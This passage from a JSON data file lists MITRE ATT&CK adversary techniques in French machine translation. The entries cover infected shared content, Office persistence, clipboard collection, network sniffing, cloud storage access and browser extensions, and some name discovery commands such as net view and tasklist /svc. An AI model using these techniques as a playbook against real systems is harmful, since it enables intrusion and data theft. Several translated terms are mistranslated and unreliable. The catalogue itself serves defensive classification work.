partag\u00e9s par le biais d\u2019infections binaires en ajoutant ou en ajoutant son code au code binaire sain sur le r\u00e9pertoire r\u00e9seau partag\u00e9. Le malware peut modifier le point d\u2019entr\u00e9e d\u2019origine (OEP) du binaire sain pour s\u2019assurer qu\u2019il est ex\u00e9cut\u00e9 avant le code l\u00e9gitime. L\u2019infection pourrait continuer \u00e0 se propager via le fichier nouvellement infect\u00e9 lorsqu\u2019il est ex\u00e9cut\u00e9 par un syst\u00e8me distant. Ces infections peuvent cibler \u00e0 la fois les formats binaires et non binaires qui se terminent par des extensions comprenant, mais sans s\u2019y limiter, .EXE, .DLL, . SCR, .BAT et/ou .VBS.\nhttps://attack.mitre.org/techniques/T1080\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1137 - D\u00e9marrage de l\u2019application Office", - "description": "Les adversaires peuvent tirer parti des applications bas\u00e9es sur Microsoft Office pour la persistance entre les startups. Microsoft Office est une suite d\u2019applications assez courante sur les syst\u00e8mes d\u2019exploitation Windows au sein d\u2019un r\u00e9seau d\u2019entreprise. Il existe plusieurs m\u00e9canismes qui peuvent \u00eatre utilis\u00e9s avec Office pour la persistance lorsqu\u2019une application Office est d\u00e9marr\u00e9e ; cela peut inclure l\u2019utilisation de macros de mod\u00e8le Office et de compl\u00e9ments. Diverses fonctionnalit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans Outlook qui peuvent \u00eatre utilis\u00e9es de mani\u00e8re abusive pour obtenir la persistance, telles que les r\u00e8gles, les formulaires et la page d\u2019accueil Outlook. (Citation: SensePost Ruler GitHub) Ces m\u00e9canismes de persistance peuvent fonctionner dans Outlook ou \u00eatre utilis\u00e9s via Office 365. (R\u00e9f\u00e9rence : R\u00e8gles Outlook TechNet O365)\nhttps://attack.mitre.org/techniques/T1137\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1119 - Collecte automatis\u00e9e", - "description": "Une fois \u00e9tabli au sein d\u2019un syst\u00e8me ou d\u2019un r\u00e9seau, un adversaire peut utiliser des techniques automatis\u00e9es pour collecter des donn\u00e9es internes. Les m\u00e9thodes d\u2019ex\u00e9cution de cette technique peuvent inclure l\u2019utilisation d\u2019un [interpr\u00e9teur de commande et de script](https://attack.mitre.org/techniques/T1059) pour rechercher et copier des informations correspondant \u00e0 des crit\u00e8res d\u00e9finis tels que le type de fichier, l\u2019emplacement ou le nom \u00e0 des intervalles de temps sp\u00e9cifiques. Dans les environnements bas\u00e9s sur le cloud, les adversaires peuvent \u00e9galement utiliser des API cloud, des interfaces de ligne de commande ou des services ETL (extraction, transformation et chargement) pour collecter automatiquement des donn\u00e9es. Cette fonctionnalit\u00e9 pourrait \u00e9galement \u00eatre int\u00e9gr\u00e9e aux outils d\u2019acc\u00e8s \u00e0 distance. Cette technique peut inclure l\u2019utilisation d\u2019autres techniques telles que [D\u00e9couverte de fichiers et de r\u00e9pertoires](https://attack.mitre.org/techniques/T1083) et [Transfert lat\u00e9ral d\u2019outils](https://attack.mitre.org/techniques/T1570) pour identifier et d\u00e9placer des fichiers, ainsi que [Tableau de bord de service cloud](https://attack.mitre.org/techniques/T1538) et [D\u00e9couverte d\u2019objets de stockage dans le cloud](https://attack.mitre.org/techniques/T1619) pour identifier les ressources dans les environnements cloud.\nhttps://attack.mitre.org/techniques/T1119\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1115 - Donn\u00e9es du presse-papiers", - "description": "Les adversaires peuvent collecter des donn\u00e9es stock\u00e9es dans le presse-papiers aupr\u00e8s des utilisateurs qui copient des informations dans ou entre les applications. Par exemple, sur Windows, les adversaires peuvent acc\u00e9der aux donn\u00e9es du presse-papiers \u00e0 l\u2019aide de clip.exe ou Get-Clipboard. (R\u00e9f\u00e9rence : MSDN Clipboard) (R\u00e9f\u00e9rence : clip_win_server) (R\u00e9f\u00e9rence : CISA_AA21_200B) De plus, les adversaires peuvent surveiller puis remplacer le presse-papiers des utilisateurs par leurs donn\u00e9es (par exemple, [Manipulation des donn\u00e9es transmises](https://attack.mitre.org/techniques/T1565/002)). (Citation: mining_ruby_reversinglabs)macOS et Linux ont \u00e9galement des commandes, telles que pbpaste, pour r\u00e9cup\u00e9rer le contenu du presse-papiers. (Citation : Exploitation avec EmPyre)\nhttps://attack.mitre.org/techniques/T1115\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1007 - D\u00e9couverte du service syst\u00e8me", - "description": "Les adversaires peuvent essayer de recueillir des informations sur les services syst\u00e8me locaux enregistr\u00e9s. Les adversaires peuvent obtenir des informations sur les services \u00e0 l\u2019aide d\u2019outils ainsi que de commandes utilitaires du syst\u00e8me d\u2019exploitation telles que sc query, tasklist /svc, systemctl --type=service et net start. Les adversaires peuvent utiliser les informations de [System Service Discovery](https://attack.mitre.org/techniques/T1007) pendant la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris si l\u2019adversaire infecte compl\u00e8tement la cible et/ou tente des actions sp\u00e9cifiques.\nhttps://attack.mitre.org/techniques/T1007\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1040 - Reniflage de r\u00e9seau", - "description": "Les adversaires peuvent renifler le trafic r\u00e9seau pour capturer des informations sur un environnement, y compris le mat\u00e9riel d\u2019authentification transmis sur le r\u00e9seau. Le reniflage r\u00e9seau fait r\u00e9f\u00e9rence \u00e0 l\u2019utilisation de l\u2019interface r\u00e9seau sur un syst\u00e8me pour surveiller ou capturer des informations envoy\u00e9es via une connexion filaire ou sans fil. Un adversaire peut placer une interface r\u00e9seau en mode promiscuit\u00e9 pour acc\u00e9der passivement aux donn\u00e9es en transit sur le r\u00e9seau, ou utiliser des ports d\u2019\u00e9tendue pour capturer une plus grande quantit\u00e9 de donn\u00e9es. Les donn\u00e9es captur\u00e9es via cette technique peuvent inclure les informations d\u2019identification de l\u2019utilisateur, en particulier celles envoy\u00e9es via un protocole non s\u00e9curis\u00e9 et non chiffr\u00e9. Les techniques d\u2019empoisonnement par r\u00e9solution de service de noms, telles que [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), peuvent \u00e9galement \u00eatre utilis\u00e9es pour capturer les informations d\u2019identification vers les sites Web, les proxys et les syst\u00e8mes internes en redirigeant le trafic vers un adversaire. Le reniflage du r\u00e9seau peut \u00e9galement r\u00e9v\u00e9ler des d\u00e9tails de configuration, tels que les services en cours d\u2019ex\u00e9cution, les num\u00e9ros de version et d\u2019autres caract\u00e9ristiques du r\u00e9seau (par exemple, adresses IP, noms d\u2019h\u00f4te, ID VLAN) n\u00e9cessaires aux activit\u00e9s ult\u00e9rieures de mouvement lat\u00e9ral et/ou d\u2019\u00e9vasion de d\u00e9fense. Dans les environnements bas\u00e9s sur le cloud, les adversaires peuvent toujours \u00eatre en mesure d\u2019utiliser des services de mise en miroir du trafic pour d\u00e9tecter le trafic r\u00e9seau des machines virtuelles. Par exemple, AWS Traffic Mirroring, GCP Packet Mirroring et Azure vTap permettent aux utilisateurs de d\u00e9finir des instances sp\u00e9cifi\u00e9es pour collecter le trafic et des cibles sp\u00e9cifi\u00e9es vers lesquelles envoyer le trafic collect\u00e9. (R\u00e9f\u00e9rence : AWS Traffic Mirroring) (Citation : GCP Packet Mirroring) (Citation : Azure Virtual Network TAP) Souvent, une grande partie de ce trafic sera en texte clair en raison de l\u2019utilisation de la terminaison TLS au niveau de l\u2019\u00e9quilibreur de charge pour r\u00e9duire la charge de chiffrement et de d\u00e9chiffrement du trafic. (Citation : Rhino Security Labs AWS VPC Traffic Mirroring) (Citation : SpecterOps AWS Traffic Mirroring) L\u2019adversaire peut alors utiliser des techniques d\u2019exfiltration telles que Transf\u00e9rer des donn\u00e9es vers un compte cloud afin d\u2019acc\u00e9der au trafic renifl\u00e9. (Citation : Rhino Security Labs AWS VPC Traffic Mirroring) Sur les p\u00e9riph\u00e9riques r\u00e9seau, les adversaires peuvent effectuer des captures r\u00e9seau \u00e0 l\u2019aide de commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'monitor capture'. (R\u00e9f\u00e9rence : US-CERT-TA18-106A) (R\u00e9f\u00e9rence : capture_embedded_packet_on_software)\nhttps://attack.mitre.org/techniques/T1040\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1530 - Donn\u00e9es du stockage en nuage", - "description": "Les adversaires peuvent acc\u00e9der aux donn\u00e9es \u00e0 partir d\u2019un stockage cloud mal s\u00e9curis\u00e9. De nombreux fournisseurs de services cloud proposent des solutions pour le stockage d\u2019objets de donn\u00e9es en ligne, telles qu\u2019Amazon S3, Azure Storage et Google Cloud Storage. Ces solutions diff\u00e8rent des autres solutions de stockage (telles que SQL ou Elasticsearch) en ce sens qu\u2019il n\u2019existe pas d\u2019application globale. Les donn\u00e9es de ces solutions peuvent \u00eatre r\u00e9cup\u00e9r\u00e9es directement \u00e0 l\u2019aide des API du fournisseur de cloud. Dans d\u2019autres cas, les fournisseurs d\u2019applications SaaS tels que Slack, Confluence et Salesforce fournissent \u00e9galement des solutions de stockage cloud en tant que cas d\u2019utilisation p\u00e9riph\u00e9rique de leur plate-forme. Ces objets cloud peuvent \u00eatre extraits directement de leur application associ\u00e9e. (Citation: EA pirat\u00e9 via Slack - juin 2021) (Citation: SecureWorld - Quelle est la s\u00e9curit\u00e9 de votre canal Slack - d\u00e9cembre 2021) (Citation : HackerNews - 3 applications SaaS Cyber Attacks - Avril 2022) (Citation : Dark Clouds_Usenix_Mulazzani_08_2011) Les adversaires peuvent collecter des donn\u00e9es sensibles \u00e0 partir de ces solutions de stockage en nuage. Les fournisseurs proposent g\u00e9n\u00e9ralement des guides de s\u00e9curit\u00e9 pour aider les utilisateurs finaux \u00e0 configurer les syst\u00e8mes, bien que les erreurs de configuration soient un probl\u00e8me courant. (R\u00e9f\u00e9rence : Amazon S3 Security, 2019) (Citation : Microsoft Azure Storage Security, 2019) (Citation : Google Cloud Storage Best Practices, 2019) Il y a eu de nombreux incidents o\u00f9 le stockage en nuage a \u00e9t\u00e9 mal s\u00e9curis\u00e9, g\u00e9n\u00e9ralement en permettant involontairement l\u2019acc\u00e8s public \u00e0 des utilisateurs non authentifi\u00e9s, un acc\u00e8s trop large par tous les utilisateurs, ou m\u00eame un acc\u00e8s pour toute personne anonyme hors du contr\u00f4le du syst\u00e8me de gestion des identit\u00e9s et des acc\u00e8s sans m\u00eame avoir besoin d\u2019autorisations utilisateur de base. Cet acc\u00e8s ouvert peut exposer divers types de donn\u00e9es sensibles, telles que les cartes de cr\u00e9dit, les informations personnellement identifiables ou les dossiers m\u00e9dicaux. (Citation : Trend Micro S3 Exposed PII, 2017) (Citation: Wired Magecart S3 Buckets, 2019) (Citation: HIPAA Journal S3 Breach, 2017) (Citation : Rclone-mega-extortion_05_2021) Les adversaires peuvent \u00e9galement obtenir puis abuser des informations d\u2019identification divulgu\u00e9es \u00e0 partir de r\u00e9f\u00e9rentiels sources, de journaux ou d\u2019autres moyens pour acc\u00e9der aux objets de stockage cloud.\nhttps://attack.mitre.org/techniques/T1530\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1135 - D\u00e9couverte de partage r\u00e9seau", - "description": "Les adversaires peuvent rechercher des dossiers et des lecteurs partag\u00e9s sur des syst\u00e8mes distants comme moyen d\u2019identifier les sources d\u2019information \u00e0 recueillir comme pr\u00e9curseur de la collecte et d\u2019identifier les syst\u00e8mes d\u2019int\u00e9r\u00eat potentiels pour les mouvements lat\u00e9raux. Les r\u00e9seaux contiennent souvent des lecteurs et des dossiers r\u00e9seau partag\u00e9s qui permettent aux utilisateurs d\u2019acc\u00e9der aux r\u00e9pertoires de fichiers sur diff\u00e9rents syst\u00e8mes d\u2019un r\u00e9seau. Le partage de fichiers sur un r\u00e9seau Windows s\u2019effectue via le protocole SMB. (Citation : Ressource partag\u00e9e Wikip\u00e9dia) (R\u00e9f\u00e9rence : dossier partag\u00e9 TechNet) [Net] (https://attack.mitre.org/software/S0039) peut \u00eatre utilis\u00e9 pour interroger un syst\u00e8me distant sur les lecteurs partag\u00e9s disponibles \u00e0 l\u2019aide de la commande net view \\\\\\\\remotesystem. Il peut \u00e9galement \u00eatre utilis\u00e9 pour interroger des lecteurs partag\u00e9s sur le syst\u00e8me local \u00e0 l\u2019aide de net share. Pour macOS, la commande sharing -l r\u00e9pertorie tous les points partag\u00e9s utilis\u00e9s pour les services smb.\nhttps://attack.mitre.org/techniques/T1135\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1120 - D\u00e9tection de p\u00e9riph\u00e9riques", - "description": "Les adversaires peuvent tenter de recueillir des informations sur les p\u00e9riph\u00e9riques connect\u00e9s et les composants connect\u00e9s \u00e0 un syst\u00e8me informatique. (Citation : Peripheral Discovery Linux) (Citation : Peripheral Discovery macOS) Les p\u00e9riph\u00e9riques peuvent inclure des ressources auxiliaires qui prennent en charge diverses fonctionnalit\u00e9s telles que les claviers, les imprimantes, les appareils photo, les lecteurs de cartes \u00e0 puce ou le stockage amovible. Les informations peuvent \u00eatre utilis\u00e9es pour am\u00e9liorer leur connaissance du syst\u00e8me et de l\u2019environnement du r\u00e9seau ou peuvent \u00eatre utilis\u00e9es pour d\u2019autres actions.\nhttps://attack.mitre.org/techniques/T1120\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1082 - D\u00e9couverte des informations syst\u00e8me", - "description": "Un adversaire peut tenter d\u2019obtenir des informations d\u00e9taill\u00e9es sur le syst\u00e8me d\u2019exploitation et le mat\u00e9riel, y compris la version, les correctifs, les correctifs, les Service Packs et l\u2019architecture. Les adversaires peuvent utiliser les informations de [System Information Discovery](https://attack.mitre.org/techniques/T1082) pendant la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris si l\u2019adversaire infecte compl\u00e8tement la cible et/ou tente des actions sp\u00e9cifiques. Des outils tels que [Systeminfo](https://attack.mitre.org/software/S0096) peuvent \u00eatre utilis\u00e9s pour collecter des informations syst\u00e8me d\u00e9taill\u00e9es. En cas d\u2019ex\u00e9cution avec un acc\u00e8s privil\u00e9gi\u00e9, une ventilation des donn\u00e9es syst\u00e8me peut \u00eatre collect\u00e9e via l\u2019outil de configuration systemsetup sous macOS. Par exemple, les adversaires disposant d\u2019un acc\u00e8s de niveau utilisateur peuvent ex\u00e9cuter la commande df -aH pour obtenir les disques actuellement mont\u00e9s et l\u2019espace librement disponible associ\u00e9. Les adversaires peuvent \u00e9galement tirer parti d\u2019une [interface de ligne de commande de p\u00e9riph\u00e9rique r\u00e9seau](https://attack.mitre.org/techniques/T1059/008) sur les p\u00e9riph\u00e9riques r\u00e9seau pour recueillir des informations syst\u00e8me d\u00e9taill\u00e9es (par exemple, show version). (R\u00e9f\u00e9rence : US-CERT-TA18-106A) [D\u00e9couverte d\u2019informations syst\u00e8me] (https://attack.mitre.org/techniques/T1082) combin\u00e9s \u00e0 des informations recueillies lors d\u2019autres formes de d\u00e9couverte et de reconnaissance peuvent stimuler le d\u00e9veloppement et la dissimulation de charges utiles. (R\u00e9f\u00e9rence : OSX. Conte de f\u00e9es)(Citation: 20 outils et techniques courants macOS)Les fournisseurs de cloud IaaS (Infrastructure as a Service) tels qu\u2019AWS, GCP et Azure permettent d\u2019acc\u00e9der aux informations sur les instances et les machines virtuelles via des API. Les appels d\u2019API authentifi\u00e9s r\u00e9ussis peuvent renvoyer des donn\u00e9es telles que la plate-forme du syst\u00e8me d\u2019exploitation et l\u2019\u00e9tat d\u2019une instance particuli\u00e8re ou la vue de mod\u00e8le d\u2019une machine virtuelle. (Citation : Amazon Describe Instance) (Citation : Google Instances Resource) (Citation : Microsoft Virutal Machine API)\nhttps://attack.mitre.org/techniques/T1082\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1071 - Protocole de couche application", - "description": "Les adversaires peuvent communiquer \u00e0 l\u2019aide de protocoles de couche d\u2019application OSI pour \u00e9viter la d\u00e9tection/filtrage r\u00e9seau en se fondant dans le trafic existant. Les commandes du syst\u00e8me distant, et souvent les r\u00e9sultats de ces commandes, seront int\u00e9gr\u00e9s dans le trafic de protocole entre le client et le serveur. Les adversaires peuvent utiliser de nombreux protocoles diff\u00e9rents, y compris ceux utilis\u00e9s pour la navigation sur le Web, le transfert de fichiers, le courrier \u00e9lectronique ou le DNS. Pour les connexions qui se produisent en interne au sein d\u2019une enclave (telles que celles entre un proxy ou un n\u0153ud pivot et d\u2019autres n\u0153uds), les protocoles couramment utilis\u00e9s sont SMB, SSH ou RDP.\nhttps://attack.mitre.org/techniques/T1071\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1053 - T\u00e2che/t\u00e2che planifi\u00e9e", - "description": "Les adversaires peuvent abuser de la fonctionnalit\u00e9 de planification des t\u00e2ches pour faciliter l\u2019ex\u00e9cution initiale ou r\u00e9currente de code malveillant. Des utilitaires existent dans tous les principaux syst\u00e8mes d\u2019exploitation pour planifier l\u2019ex\u00e9cution de programmes ou de scripts \u00e0 une date et une heure sp\u00e9cifi\u00e9es. Une t\u00e2che peut \u00e9galement \u00eatre planifi\u00e9e sur un syst\u00e8me distant, \u00e0 condition que l\u2019authentification appropri\u00e9e soit respect\u00e9e (par exemple, RPC et partage de fichiers et d\u2019imprimantes dans les environnements Windows). La planification d\u2019une t\u00e2che sur un syst\u00e8me distant peut g\u00e9n\u00e9ralement n\u00e9cessiter d\u2019\u00eatre membre d\u2019un administrateur ou d\u2019un groupe privil\u00e9gi\u00e9 sur le syst\u00e8me distant. (R\u00e9f\u00e9rence : S\u00e9curit\u00e9 du Planificateur de t\u00e2ches TechNet) Les adversaires peuvent utiliser la planification des t\u00e2ches pour ex\u00e9cuter des programmes au d\u00e9marrage du syst\u00e8me ou sur une base planifi\u00e9e pour la persistance. Ces m\u00e9canismes peuvent \u00e9galement \u00eatre utilis\u00e9s de mani\u00e8re abusive pour ex\u00e9cuter un processus dans le contexte d\u2019un compte sp\u00e9cifi\u00e9 (tel qu\u2019un compte avec des autorisations/privil\u00e8ges \u00e9lev\u00e9s). \u00c0 l\u2019instar de [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), les adversaires ont \u00e9galement abus\u00e9 de la planification des t\u00e2ches pour masquer potentiellement une ex\u00e9cution unique dans le cadre d\u2019un processus syst\u00e8me approuv\u00e9. (Citation : ProofPoint Serpent)\nhttps://attack.mitre.org/techniques/T1053\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1176 - Extensions de navigateur", - "description": "Les adversaires peuvent abuser des extensions de navigateur Internet pour \u00e9tablir un acc\u00e8s persistant aux syst\u00e8mes des victimes. Les extensions de navigateur ou plugins sont de petits programmes qui peuvent ajouter des fonctionnalit\u00e9s et personnaliser des aspects des navigateurs Internet. Ils peuvent \u00eatre install\u00e9s directement ou via la boutique d\u2019applications d\u2019un navigateur et ont g\u00e9n\u00e9ralement acc\u00e8s et autorisations \u00e0 tout ce \u00e0 quoi le navigateur peut acc\u00e9der. (Citation: Wikipedia Browser Extension) (Citation: D\u00e9finition des extensions Chrome) Les extensions malveillantes peuvent \u00eatre install\u00e9es dans un navigateur par le biais de t\u00e9l\u00e9chargements malveillants de magasins d\u2019applications se faisant passer pour des extensions l\u00e9gitimes, par ing\u00e9nierie sociale ou par un adversaire qui a d\u00e9j\u00e0 compromis un syst\u00e8me. La s\u00e9curit\u00e9 peut \u00eatre limit\u00e9e sur les magasins d\u2019applications de navigateur, il peut donc ne pas \u00eatre difficile pour les extensions malveillantes de vaincre les scanners automatis\u00e9s. (Citation : Num\u00e9ros d\u2019extension Chrome malveillants) Selon le navigateur, les adversaires peuvent \u00e9galement manipuler l\u2019URL de mise \u00e0 jour d\u2019une extension pour installer des mises \u00e0 jour \u00e0 partir d\u2019un serveur contr\u00f4l\u00e9 par l\u2019adversaire ou manipuler le fichier de configuration mobile pour installer silencieusement des extensions suppl\u00e9mentaires. Avant macOS 11, les adversaires pouvaient installer silencieusement des extensions de navigateur via la ligne de commande \u00e0 l\u2019aide de l\u2019outil profiles pour installer des fichiers malveillants .mobileconfig. Sous macOS 11+, l\u2019utilisation de l\u2019outil profiles ne peut plus installer de profils de configuration, mais les fichiers .mobileconfig peuvent \u00eatre plant\u00e9s et install\u00e9s avec l\u2019intervention de l\u2019utilisateur. (Citation: xorrior chrome extensions macOS) Une fois l\u2019extension install\u00e9e, elle peut naviguer vers des sites Web en arri\u00e8re-plan, voler toutes les informations qu\u2019un utilisateur entre dans un navigateur (y compris les informations d\u2019identification) et \u00eatre utilis\u00e9e comme programme d\u2019installation pour un RAT pour la persistance. (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: extension Catch All Chrome) Il y a \u00e9galement eu des cas de botnets utilisant une porte d\u00e9rob\u00e9e persistante via des extensions Chrome malveillantes. (Citation : Stantinko Botnet) Il y a \u00e9galement eu des exemples similaires d\u2019extensions utilis\u00e9es pour le commandement et le contr\u00f4le. (Citation: Chrome Extension C2 Malware)\nhttps://attack.mitre.org/techniques/T1176\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1106 - API native", - "description": "Les adversaires peuvent interagir avec l\u2019interface de programmation d\u2019application (API) native du syst\u00e8me d\u2019exploitation pour ex\u00e9cuter des comportements. Les API natives fournissent un moyen contr\u00f4l\u00e9 d\u2019appeler des services de syst\u00e8me d\u2019exploitation de bas niveau au sein du noyau, tels que ceux impliquant du mat\u00e9riel/p\u00e9riph\u00e9rique, de la m\u00e9moire et des processus. (Citation : NT API Windows) (Citation : API du noyau Linux) Ces API natives sont exploit\u00e9es par le syst\u00e8me d\u2019exploitation lors du d\u00e9marrage du syst\u00e8me (lorsque les autres composants du syst\u00e8me ne sont pas encore initialis\u00e9s) ainsi que lors de l\u2019ex\u00e9cution de t\u00e2ches et de requ\u00eates lors d\u2019op\u00e9rations de routine. Les fonctions API natives (telles que NtCreateProcess) peuvent \u00eatre appel\u00e9es via des appels syst\u00e8me / syscalls, mais ces fonctionnalit\u00e9s sont \u00e9galement souvent expos\u00e9es aux applications en mode utilisateur via des interfaces et des biblioth\u00e8ques. (Citation : Appels syst\u00e8me OutFlank) (Citation : Appels syst\u00e8me CyberBit) (R\u00e9f\u00e9rence : Appels syst\u00e8me MDSec) Par exemple, des fonctions telles que l\u2019API Windows CreateProcess() ou GNU fork() permettront aux programmes et aux scripts de d\u00e9marrer d\u2019autres processus. (R\u00e9f\u00e9rence : Microsoft CreateProcess) (Citation : GNU Fork) Cela peut permettre aux appelants d\u2019API d\u2019ex\u00e9cuter un binaire, d\u2019ex\u00e9cuter une commande CLI, de charger des modules, etc. car des milliers de fonctions API similaires existent pour diverses op\u00e9rations syst\u00e8me. (R\u00e9f\u00e9rence : Microsoft Win32) (Citation : LIBC) (R\u00e9f\u00e9rence : GLIBC) Des frameworks logiciels de niveau sup\u00e9rieur, tels que Microsoft .NET et macOS Cocoa, sont \u00e9galement disponibles pour interagir avec les API natives. Ces frameworks fournissent g\u00e9n\u00e9ralement des wrappers/abstractions de langage aux fonctionnalit\u00e9s d\u2019API et sont con\u00e7us pour faciliter l\u2019utilisation/la portabilit\u00e9 du code. (R\u00e9f\u00e9rence : Microsoft NET) (R\u00e9f\u00e9rence : Apple Core Services) (Citation : MACOS Cacao) (Citation : Fondation macOS) Les adversaires peuvent abuser de ces fonctions d\u2019API du syst\u00e8me d\u2019exploitation comme moyen d\u2019ex\u00e9cuter des comportements. Semblable \u00e0 [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), l\u2019API native et sa hi\u00e9rarchie d\u2019interfaces fournissent des m\u00e9canismes permettant d\u2019interagir avec divers composants d\u2019un syst\u00e8me victimis\u00e9 et de les utiliser. Tout en invoquant des fonctions API, les adversaires peuvent \u00e9galement tenter de contourner les outils d\u00e9fensifs (ex: d\u00e9crocher des fonctions surveill\u00e9es via [D\u00e9sactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001)).\nhttps://attack.mitre.org/techniques/T1106\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1202 - Ex\u00e9cution indirecte des commandes", - "description": "Les adversaires peuvent abuser des utilitaires qui permettent l\u2019ex\u00e9cution de commandes pour contourner les restrictions de s\u00e9curit\u00e9 qui limitent l\u2019utilisation des interpr\u00e9teurs de ligne de commande. Divers utilitaires Windows peuvent \u00eatre utilis\u00e9s pour ex\u00e9cuter des commandes, \u00e9ventuellement sans invoquer [cmd](https://attack.mitre.org/software/S0106). Par exemple, [Forfiles](https://attack.mitre.org/software/S0193), l\u2019Assistant Compatibilit\u00e9 des programmes (pcalua.exe), les composants du sous-syst\u00e8me Windows pour Linux (WSL), ainsi que d\u2019autres utilitaires peuvent appeler l\u2019ex\u00e9cution de programmes et de commandes \u00e0 partir d\u2019un [interpr\u00e9teur de commandes et de scripts](https://attack.mitre.org/techniques/T1059), d\u2019une fen\u00eatre Ex\u00e9cuter ou via des scripts. (Citation: VectorSec ForFiles ao\u00fbt 2017) (Citation: Evi1cg Forfiles Nov 2017) Les adversaires peuvent abuser de ces fonctionnalit\u00e9s pour [Defense Evasion](https://attack.mitre.org/tactics/TA0005), en particulier pour effectuer une ex\u00e9cution arbitraire tout en subvertissant les d\u00e9tections et/ou les contr\u00f4les d\u2019att\u00e9nuation (tels que la strat\u00e9gie de groupe) qui limitent/emp\u00eachent l\u2019utilisation de [cmd](https://attack.mitre.org/software/S0106) ou d\u2019extensions de fichiers plus commun\u00e9ment associ\u00e9es \u00e0 des charges utiles malveillantes.\nhttps://attack.mitre.org/techniques/T1202\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1091 - R\u00e9plication via un support amovible", - "description": "Les adversaires peuvent se d\u00e9placer sur des syst\u00e8mes, \u00e9ventuellement sur des r\u00e9seaux d\u00e9connect\u00e9s ou \u00e0 air comprim\u00e9, en copiant des logiciels malveillants sur des supports amovibles et en tirant parti des fonctionnalit\u00e9s d\u2019ex\u00e9cution automatique lorsque le m\u00e9dia est ins\u00e9r\u00e9 dans un syst\u00e8me et s\u2019ex\u00e9cute. Dans le cas du mouvement lat\u00e9ral, cela peut se produire en modifiant les fichiers ex\u00e9cutables stock\u00e9s sur un support amovible ou en copiant des logiciels malveillants et en les renommant pour ressembler \u00e0 un fichier l\u00e9gitime afin d\u2019inciter les utilisateurs \u00e0 l\u2019ex\u00e9cuter sur un syst\u00e8me distinct. Dans le cas de l\u2019acc\u00e8s initial, cela peut se produire par la manipulation manuelle du support, la modification des syst\u00e8mes utilis\u00e9s pour formater initialement le support ou la modification du micrologiciel du support lui-m\u00eame. Les appareils mobiles peuvent \u00e9galement \u00eatre utilis\u00e9s pour infecter les PC avec des logiciels malveillants s\u2019ils sont connect\u00e9s via USB. (Citation: Exploitation USB du smartphone) Cette infection peut \u00eatre r\u00e9alis\u00e9e \u00e0 l\u2019aide d\u2019appareils (Android, iOS, etc.) et, dans certains cas, de c\u00e2bles de chargement USB. (Citation: Logiciel malveillant Windows infectant Android) (Citation: iPhone Charging Cable Hack) Par exemple, lorsqu\u2019un smartphone est connect\u00e9 \u00e0 un syst\u00e8me, il peut sembler \u00eatre mont\u00e9 de la m\u00eame mani\u00e8re qu\u2019un lecteur de disque connect\u00e9 par USB. Si un logiciel malveillant compatible avec le syst\u00e8me connect\u00e9 se trouve sur l\u2019appareil mobile, il peut infecter la machine (en particulier si les fonctionnalit\u00e9s d\u2019ex\u00e9cution automatique sont activ\u00e9es).\nhttps://attack.mitre.org/techniques/T1091\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1005 - Donn\u00e9es du syst\u00e8me local", - "description": "Les adversaires peuvent rechercher des sources syst\u00e8me locales, telles que des syst\u00e8mes de fichiers et des fichiers de configuration ou des bases de donn\u00e9es locales, pour trouver des fichiers d\u2019int\u00e9r\u00eat et des donn\u00e9es sensibles avant Exfiltration.Les adversaires peuvent le faire \u00e0 l\u2019aide d\u2019un [interpr\u00e9teur de commandes et de scripts](https://attack.mitre.org/techniques/T1059), tel que [cmd](https://attack.mitre.org/software/S0106) ainsi qu\u2019un [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), qui ont la fonctionnalit\u00e9 d\u2019interagir avec le syst\u00e8me de fichiers pour rassembler information. (R\u00e9f\u00e9rence : show_run_config_cmd_cisco) Les adversaires peuvent \u00e9galement utiliser [Automated Collection](https://attack.mitre.org/techniques/T1119) sur le syst\u00e8me local.\nhttps://attack.mitre.org/techniques/T1005\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1140 - D\u00e9sobfusquer/d\u00e9coder des fichiers ou des informations", - "description": "Les adversaires peuvent utiliser [Fichiers ou informations obscurcis](https://attack.mitre.org/techniques/T1027) pour cacher les artefacts d\u2019une intrusion \u00e0 l\u2019analyse. Ils peuvent avoir besoin de m\u00e9canismes distincts pour d\u00e9coder ou d\u00e9brouiller cette information selon la fa\u00e7on dont ils ont l\u2019intention de l\u2019utiliser. Les m\u00e9thodes pour ce faire incluent la fonctionnalit\u00e9 int\u00e9gr\u00e9e des logiciels malveillants ou en utilisant les utilitaires pr\u00e9sents sur le syst\u00e8me. Un exemple est l\u2019utilisation de [certutil](https://attack.mitre.org/software/S0160) pour d\u00e9coder un fichier 